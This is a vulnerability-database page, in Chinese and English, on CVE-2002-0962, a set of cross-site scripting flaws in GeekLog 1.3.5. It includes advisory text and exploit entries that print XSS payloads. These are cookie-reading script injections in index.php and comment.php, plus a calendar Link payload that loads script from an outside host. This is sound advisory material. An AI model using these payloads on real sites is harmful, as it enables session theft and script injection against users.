CVE-2002-0962
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:24
NMCOES    

[原文]Cross-site scripting vulnerabilities in GeekLog 1.3.5 and earlier allow remote attackers to execute arbitrary script via (1) the url variable in the Link field of a calendar event, (2) the topic parameter in index.php, or (3) the title parameter in comment.php.


[CNNVD]Geeklog日历时间表单脚本注入漏洞(CNNVD-200210-049)

        GeekLog 1.3.5及其更早版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助(1)日历时间Link字段的url变量,(2)index.php的topic参数,(3)comment.php的title参数执行任意脚本。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0962
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0962
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-049
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4974
(VENDOR_ADVISORY)  BID  4974
http://www.securityfocus.com/bid/4969
(VENDOR_ADVISORY)  BID  4969
http://www.iss.net/security_center/static/9310.php
(VENDOR_ADVISORY)  XF  geeklog-index-comment-xss(9310)
http://www.iss.net/security_center/static/9309.php
(VENDOR_ADVISORY)  XF  geeklog-calendar-event-xss(9309)
http://geeklog.sourceforge.net/article.php?story=20020610013358149
(UNKNOWN)  CONFIRM  http://geeklog.sourceforge.net/article.php?story=20020610013358149
http://archives.neohapsis.com/archives/bugtraq/2002-06/0058.html
(UNKNOWN)  BUGTRAQ  20020610 [ARL02-A13] Multiple Security Issues in GeekLog

- 漏洞信息

Geeklog日历时间表单脚本注入漏洞
高危 跨站脚本
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        GeekLog 1.3.5及其更早版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助(1)日历时间Link字段的url变量,(2)index.php的topic参数,(3)comment.php的title参数执行任意脚本。

- 公告与补丁

        This issue has been addressed in Geeklog 1.3.5 sr1:
        Geeklog Geeklog 1.3.5
        

- 漏洞信息 (21525)

Geeklog 1.3.5 Multiple Cross Site Scripting Vulnerabilities (EDBID:21525)
php webapps
2002-06-10 Verified
0 Ahmet Sabri ALPER
N/A [点击下载]
source: http://www.securityfocus.com/bid/4969/info

Geeklog does not filter script code from URL parameters, making it prone to cross-site scripting attacks. Attacker-supplied script code may be included in a malicious link to the 'index.php' or 'comment.php' script. Such a malicious link might be included in a HTML e-mail or on a malicious webpage.

This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users of a host running Geeklog.

This issue has been reported to exist in Geeklog 1.3.5, earlier versions may also be susceptible to this issue. 

/index.php?topic=<script>alert(document.cookie)</script>
/comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article 		

- 漏洞信息 (21528)

Geeklog 1.3.5 Calendar Event Form Script Injection Vulnerability (EDBID:21528)
php webapps
2002-06-10 Verified
0 Ahmet Sabri ALPER
N/A [点击下载]
source: http://www.securityfocus.com/bid/4974/info

Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.

Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website. 

Link input($url) :<scriptsrc="http://forum.olympos.org/f.js">Alper</script> 		

- 漏洞信息

8073
Geeklog comment.php title Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Geeklog contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "title" parameter upon submission to the comment.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2002-06-10 Unknow
2002-06-10 Unknow

- 解决方案

Upgrade to version 1.3.5sr1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Geeklog Calendar Event Form Script Injection Vulnerability
Input Validation Error 4974
Yes No
2002-06-10 12:00:00 2009-07-11 01:56:00
Discovered by Ahmet Sabri ALPER <s_alper@hotmail.com>.

- 受影响的程序版本

Geeklog Geeklog 1.3.5
Geeklog Geeklog 1.3.5 sr1

- 不受影响的程序版本

Geeklog Geeklog 1.3.5 sr1

- 漏洞讨论

Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.

Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website.

- 漏洞利用

Ahmet Sabri ALPER &lt;s_alper@hotmail.com&gt; has provided the following exploit information:

Link input($url) :&amp;lt;scriptsrc="http://forum.olympos.org/f.js"&gt;Alper&amp;lt;/script&amp;gt;

- 解决方案

This issue has been addressed in Geeklog 1.3.5 sr1:


Geeklog Geeklog 1.3.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站